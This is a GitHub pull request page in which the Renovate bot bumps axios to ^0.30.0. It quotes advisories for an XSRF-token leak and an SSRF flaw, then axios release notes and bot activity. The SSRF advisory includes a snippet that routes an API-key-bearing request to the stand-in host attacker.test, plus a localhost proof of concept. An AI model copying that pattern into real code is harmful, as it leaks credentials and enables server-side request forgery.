Movatterモバイル変換


[0]ホーム

URL:


Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly

Sign up
Appearance settings

chore(deps): update dependency axios to ^0.30.0 [security]#7963

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to ourterms of service andprivacy statement. We’ll occasionally send you account related emails.

Already on GitHub?Sign in to your account

Open
renovate wants to merge1 commit intomain
base:main
Choose a base branch
Loading
fromrenovate/npm-axios-vulnerability

Conversation

@renovate
Copy link
Contributor

@renovaterenovatebot commentedDec 2, 2024
edited
Loading

This PR contains the following updates:

PackageChangeAgeConfidence
axios (source)^0.22.0 ->^0.30.0ageconfidence

GitHub Vulnerability Alerts

CVE-2023-45857

An issue discovered in Axios 0.8.1 through 1.5.1 inadvertently reveals the confidential XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host allowing attackers to view sensitive information.

CVE-2025-27152

Summary

A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery). Reference:axios/axios#6463

A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if ⁠baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.

Details

Consider the following code snippet:

importaxiosfrom"axios";constinternalAPIClient=axios.create({baseURL:"http://example.test/api/v1/users/",headers:{"X-API-KEY":"1234567890",},});// const userId = "123";constuserId="http://attacker.test/";awaitinternalAPIClient.get(userId);// SSRF

In this example, the request is sent tohttp://attacker.test/ instead of thebaseURL. As a result, the domain owner ofattacker.test would receive theX-API-KEY included in the request headers.

It is recommended that:

  • WhenbaseURL is set, passing an absolute URL such ashttp://attacker.test/ toget() should not ignorebaseURL.
  • Before sending the HTTP request (after combining thebaseURL with the user-provided parameter), axios should verify that the resulting URL still begins with the expectedbaseURL.

PoC

Follow the steps below to reproduce the issue:

  1. Set up two simple HTTP servers:
mkdir /tmp/server1 /tmp/server2echo "this is server1" > /tmp/server1/index.html echo "this is server2" > /tmp/server2/index.htmlpython -m http.server -d /tmp/server1 10001 &python -m http.server -d /tmp/server2 10002 &
  1. Create a script (e.g., main.js):
importaxiosfrom"axios";constclient=axios.create({baseURL:"http://localhost:10001/"});constresponse=awaitclient.get("http://localhost:10002/");console.log(response.data);
  1. Run the script:
$ node main.jsthis is server2

Even thoughbaseURL is set tohttp://localhost:10001/, axios sends the request tohttp://localhost:10002/.

Impact

  • Credential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed.
  • SSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running.
  • Affected Users: Software that usesbaseURL and does not validate path parameters is affected by this issue.

Release Notes

axios/axios (axios)

v0.30.0

Compare Source

Release notes:

Bug Fixes
Contributors to this release

Full Changelog:axios/axios@v0.29.0...v0.30.0

v0.29.0

Compare Source

Release notes:

Bug Fixes
Contributors to this release

v0.28.1

Compare Source

Release notes:

Release notes:

Bug Fixes
  • fix(backport): custom params serializer support (#​6263)
  • fix(backport): uncaught ReferenceErrorreq is not defined (#​6307)

v0.28.0

Compare Source

Release notes:

Bug Fixes
Backports from v1.x:
  • Allow null indexes on formSerializer and paramsSerializer v0.x (#​4961)
  • Fixing content-type header repeated#​4745
  • Fixed timeout error message for HTTP 4738
  • Addedaxios.formToJSON method (#​4735)
  • URL params serializer (#​4734)
  • Fixed toFormData Blob issue on node>v17#​4728
  • Adding types for progress event callbacks#​4675
  • Fixed max body length defaults#​4731
  • Added data URL support for node.js (#​4725)
  • Added isCancel type assert (#​4293)
  • Added the ability for theurl-encoded-form serializer to respect theformSerializer config (#​4721)
  • Addstring[] toAxiosRequestHeaders type (#​4322)
  • Allow type definition for axios instance methods (#​4224)
  • FixedAxiosError stack capturing; (#​4718)
  • FixedAxiosError status code type; (#​4717)
  • Adding Canceler parameters config and request (#​4711)
  • fix(types): allow to specify partial default headers for instance creation (#​4185)
  • Addedblob to the list of protocols supported by the browser (#​4678)
  • Fixing Z_BUF_ERROR when no content (#​4701)
  • Fixed race condition on immediate requests cancellation (#​4261)
  • Added a clear() function to the request and response interceptors object so a user can ensure that all interceptors have been removed from an Axios instance#​4248
  • Added generic AxiosAbortSignal TS interface to avoid importing AbortController polyfill (#​4229)
  • Fix TS definition for AxiosRequestTransformer (#​4201)
  • Use type alias instead of interface for AxiosPromise (#​4505)
  • Include request and config when creating a CanceledError instance (#​4659)
  • Added generic TS types for the exposed toFormData helper (#​4668)
  • Optimized the code that checks cancellation (#​4587)
  • Replaced webpack with rollup (#​4596)
  • Added stack trace to AxiosError (#​4624)
  • Updated AxiosError.config to be optional in the type definition (#​4665)
  • Removed incorrect argument for NetworkError constructor (#​4656)

v0.27.2

Compare Source

Fixes and Functionality:

  • Fixed FormData posting in browser environment by reverting#​3785 (#​4640)
  • Enhanced protocol parsing implementation (#​4639)
  • Fixed bundle size

v0.27.1

Compare Source

Fixes and Functionality:
  • Removed import of url module in browser build due to huge size overhead and builds being broken (#​4594)
  • Bumped follow-redirects to ^1.14.9 (#​4615)

v0.27.0

Compare Source

Breaking changes:
  • New toFormData helper function that allows the implementor to pass an object and allow axios to convert it to FormData (#​3757)
  • Removed functionality that removed the theContent-Type request header when passing FormData (#​3785)
  • (*) Refactored error handling implementing AxiosError as a constructor, this is a large change to error handling on the whole (#​3645)
  • Separated responsibility for FormData instantiation betweentransformRequest andtoFormData (#​4470)
  • (*) Improved and fixed multiple issues with FormData support (#​4448)
QOL and DevX improvements:
  • Added a multipart/form-data testing playground allowing contributors to debug changes easily (#​4465)
Fixes and Functionality:
  • Refactored project file structure to avoid circular imports (#​4515) & (#​4516)
  • Bumped follow-redirects to ^1.14.9 (#​4562)
Internal and Tests:
  • Updated dev dependencies to latest version
Documentation:
  • Fixing incorrect link in changelog (#​4551)
Notes:
  • (*) Please read these pull requests before updating, these changes are very impactful and far reaching.

v0.26.1

Compare Source

Fixes and Functionality:
  • Refactored project file structure to avoid circular imports (#​4220)

v0.26.0

Compare Source

Fixes and Functionality:
  • Fixed The timeoutErrorMessage property in config not work with Node.js (#​3581)
  • Added errors to be displayed when the query parsing process itself fails (#​3961)
  • Fix/remove url required (#​4426)
  • Update follow-redirects dependency due to Vulnerability (#​4462)
  • Bump karma from 6.3.11 to 6.3.14 (#​4461)
  • Bump follow-redirects from 1.14.7 to 1.14.8 (#​4473)

v0.25.0

Compare Source

Breaking changes:
  • Fixing maxBodyLength enforcement (#​3786)
  • Don't rely on strict mode behaviour for arguments (#​3470)
  • Adding error handling when missing url (#​3791)
  • Update isAbsoluteURL.js removing escaping of non-special characters (#​3809)
  • Use native Array.isArray() in utils.js (#​3836)
  • Adding error handling inside stream end callback (#​3967)
Fixes and Functionality:
  • Added aborted even handler (#​3916)
  • Header types expanded allowingboolean andnumber types (#​4144)
  • Fix cancel signature allowing cancel message to beundefined (#​3153)
  • Updated type checks to be formulated better (#​3342)
  • Avoid unnecessary buffer allocations (#​3321)
  • Adding a socket handler to keep TCP connection live when processing long living requests (#​3422)
  • Added toFormData helper function (#​3757)
  • Adding responseEncoding prop type in AxiosRequestConfig (#​3918)
Internal and Tests:
  • Adding axios-test-instance to ecosystem (#​3786)
  • Optimize the logic of isAxiosError (#​3546)
  • Add tests and documentation to display how multiple inceptors work (#​3564)
  • Updating follow-redirects to version 1.14.7 (#​4379)
Documentation:
  • Fixing changelog to show corrext pull request (#​4219)
  • Update upgrade guide for https proxy setting (#​3604)

Huge thanks to everyone who contributed to this release via code (authors listed below) or via reviews and triaging on GitHub:

v0.24.0

Compare Source

Breaking changes:
  • Revert: change type of AxiosResponse to any, please read lengthy discussion here: (#​4141) pull request: (#​4186)

Huge thanks to everyone who contributed to this release via code (authors listed below) or via reviews and triaging on GitHub:

v0.23.0

Compare Source

Breaking changes:
  • Distinguish request and response data types (#​4116)
  • Change never type to unknown (#​4142)
  • Fixed TransitionalOptions typings (#​4147)
Fixes and Functionality:
  • Adding globalObject: 'this' to webpack config (#​3176)
  • Adding insecureHTTPParser type to AxiosRequestConfig (#​4066)
  • Fix missing semicolon in typings (#​4115)
  • Fix response headers types (#​4136)
Internal and Tests:
  • Improve timeout error when timeout is browser default (#​3209)
  • Fix node version on CI (#​4069)
  • Added testing to TypeScript portion of project (#​4140)
Documentation:

Huge thanks to everyone who contributed to this release via code (authors listed below) or via reviews and triaging on GitHub:


Configuration

📅Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR was generated byMend Renovate. View therepository job log.

@renovaterenovatebot changed the titlechore(deps): update dependency axios to ^0.29.0 [security]chore(deps): update dependency axios to ^0.28.0 [security]Dec 2, 2024
@renovaterenovatebotforce-pushed therenovate/npm-axios-vulnerability branch from4f5f44c to0a13a0aCompareDecember 2, 2024 11:11
@renovaterenovatebotforce-pushed therenovate/npm-axios-vulnerability branch from0a13a0a toe85a85dCompareDecember 17, 2024 19:23
@renovaterenovatebot changed the titlechore(deps): update dependency axios to ^0.28.0 [security]chore(deps): update dependency axios to ^0.29.0 [security]Dec 17, 2024
@renovaterenovatebotforce-pushed therenovate/npm-axios-vulnerability branch frome85a85d toddbbbc6CompareDecember 17, 2024 23:25
@renovaterenovatebot changed the titlechore(deps): update dependency axios to ^0.29.0 [security]chore(deps): update dependency axios to ^0.28.0 [security]Dec 17, 2024
@renovaterenovatebotforce-pushed therenovate/npm-axios-vulnerability branch fromddbbbc6 todefeb87CompareDecember 22, 2024 19:47
@renovaterenovatebot changed the titlechore(deps): update dependency axios to ^0.28.0 [security]chore(deps): update dependency axios to ^0.29.0 [security]Dec 22, 2024
@renovaterenovatebotforce-pushed therenovate/npm-axios-vulnerability branch fromdefeb87 toa5e1370CompareDecember 22, 2024 22:48
@renovaterenovatebot changed the titlechore(deps): update dependency axios to ^0.29.0 [security]chore(deps): update dependency axios to ^0.28.0 [security]Dec 22, 2024
@renovaterenovatebotforce-pushed therenovate/npm-axios-vulnerability branch froma5e1370 tof8a8e21CompareJanuary 5, 2025 08:55
@renovaterenovatebot changed the titlechore(deps): update dependency axios to ^0.28.0 [security]chore(deps): update dependency axios to ^0.29.0 [security]Jan 5, 2025
@renovaterenovatebotforce-pushed therenovate/npm-axios-vulnerability branch fromf8a8e21 toaf43a55CompareJanuary 5, 2025 08:56
@renovaterenovatebot changed the titlechore(deps): update dependency axios to ^0.29.0 [security]chore(deps): update dependency axios to ^0.28.0 [security]Jan 5, 2025
@renovaterenovatebotforce-pushed therenovate/npm-axios-vulnerability branch fromaf43a55 to9a3bce9CompareJanuary 5, 2025 08:56
@renovaterenovatebot changed the titlechore(deps): update dependency axios to ^0.28.0 [security]chore(deps): update dependency axios to ^0.29.0 [security]Jan 5, 2025
@renovaterenovatebot changed the titlechore(deps): update dependency axios to ^0.29.0 [security]chore(deps): update dependency axios to ^0.28.0 [security]Jan 5, 2025
@renovaterenovatebotforce-pushed therenovate/npm-axios-vulnerability branch from9a3bce9 to19f0e9dCompareJanuary 5, 2025 09:05
@renovaterenovatebotforce-pushed therenovate/npm-axios-vulnerability branch from19f0e9d tof882f83CompareJanuary 14, 2025 17:56
@renovaterenovatebot changed the titlechore(deps): update dependency axios to ^0.28.0 [security]chore(deps): update dependency axios to ^0.29.0 [security]Jan 14, 2025
@renovaterenovatebot changed the titlechore(deps): update dependency axios to ^0.29.0 [security]chore(deps): update dependency axios to ^0.28.0 [security]Jan 14, 2025
@renovaterenovatebotforce-pushed therenovate/npm-axios-vulnerability branch fromf882f83 toab2eab5CompareJanuary 14, 2025 23:22
@renovaterenovatebot changed the titlechore(deps): update dependency axios to ^0.28.0 [security]chore(deps): update dependency axios to ^0.29.0 [security]Jan 23, 2025
@renovaterenovatebotforce-pushed therenovate/npm-axios-vulnerability branch fromab2eab5 to0c43b54CompareJanuary 23, 2025 21:17
@renovaterenovatebot changed the titlechore(deps): update dependency axios to ^0.29.0 [security]chore(deps): update dependency axios to ^0.28.0 [security]Jan 24, 2025
@renovaterenovatebotforce-pushed therenovate/npm-axios-vulnerability branch 2 times, most recently frombec3061 to4cd19d1CompareJanuary 30, 2025 14:19
@renovaterenovatebot changed the titlechore(deps): update dependency axios to ^0.28.0 [security]chore(deps): update dependency axios to ^0.29.0 [security]Jan 30, 2025
@renovaterenovatebot changed the titlechore(deps): update dependency axios to ^0.29.0 [security]chore(deps): update dependency axios to ^0.28.0 [security]Jan 30, 2025
@renovaterenovatebotforce-pushed therenovate/npm-axios-vulnerability branch from4cd19d1 toc1055e5CompareJanuary 30, 2025 18:34
@renovaterenovatebotforce-pushed therenovate/npm-axios-vulnerability branch from909cbd6 tobf3f37fCompareMay 13, 2025 11:36
@renovaterenovatebot changed the titlechore(deps): update dependency axios to ^0.28.0 [security]chore(deps): update dependency axios to ^0.30.0 [security]May 13, 2025
@renovaterenovatebot changed the titlechore(deps): update dependency axios to ^0.30.0 [security]chore(deps): update dependency axios to ^0.28.0 [security]May 13, 2025
@renovaterenovatebotforce-pushed therenovate/npm-axios-vulnerability branch 2 times, most recently from42c36b6 to65484baCompareMay 19, 2025 16:14
@renovaterenovatebot changed the titlechore(deps): update dependency axios to ^0.28.0 [security]chore(deps): update dependency axios to ^0.30.0 [security]May 19, 2025
@renovaterenovatebotforce-pushed therenovate/npm-axios-vulnerability branch from65484ba toa5d392eCompareMay 19, 2025 20:33
@renovaterenovatebot changed the titlechore(deps): update dependency axios to ^0.30.0 [security]chore(deps): update dependency axios to ^0.28.0 [security]May 19, 2025
@renovaterenovatebotforce-pushed therenovate/npm-axios-vulnerability branch froma5d392e to50597eaCompareMay 28, 2025 08:05
@renovaterenovatebot changed the titlechore(deps): update dependency axios to ^0.28.0 [security]chore(deps): update dependency axios to ^0.30.0 [security]May 28, 2025
@renovaterenovatebot changed the titlechore(deps): update dependency axios to ^0.30.0 [security]chore(deps): update dependency axios to ^0.28.0 [security]May 28, 2025
@renovaterenovatebotforce-pushed therenovate/npm-axios-vulnerability branch from50597ea tof62b5e3CompareMay 28, 2025 15:37
@renovaterenovatebotforce-pushed therenovate/npm-axios-vulnerability branch fromf62b5e3 to54c648dCompareJune 6, 2025 01:22
@renovaterenovatebot changed the titlechore(deps): update dependency axios to ^0.28.0 [security]chore(deps): update dependency axios to ^0.30.0 [security]Jun 6, 2025
@renovaterenovatebotforce-pushed therenovate/npm-axios-vulnerability branch from54c648d to71b6601CompareJune 6, 2025 23:36
@renovaterenovatebot changed the titlechore(deps): update dependency axios to ^0.30.0 [security]chore(deps): update dependency axios to ^0.28.0 [security]Jun 6, 2025
@renovaterenovatebot changed the titlechore(deps): update dependency axios to ^0.28.0 [security]chore(deps): update dependency axios to ^0.30.0 [security]Jun 13, 2025
@renovaterenovatebotforce-pushed therenovate/npm-axios-vulnerability branch from71b6601 to7b1e27aCompareJune 13, 2025 07:36
@renovaterenovatebotforce-pushed therenovate/npm-axios-vulnerability branch from7b1e27a to67a738aCompareAugust 10, 2025 13:57
@renovaterenovatebotforce-pushed therenovate/npm-axios-vulnerability branch 4 times, most recently from32bbcb4 tof19fa81CompareAugust 27, 2025 11:34
@renovaterenovatebotforce-pushed therenovate/npm-axios-vulnerability branch 4 times, most recently from4218b86 to52866d1CompareSeptember 20, 2025 06:53
@renovaterenovatebotforce-pushed therenovate/npm-axios-vulnerability branch from52866d1 to47cefbdCompareNovember 18, 2025 03:13
@renovaterenovatebotforce-pushed therenovate/npm-axios-vulnerability branch from47cefbd to11d8d09CompareNovember 23, 2025 13:30
Sign up for freeto join this conversation on GitHub. Already have an account?Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

0 participants


[8]ページ先頭

©2009-2025 Movatter.jp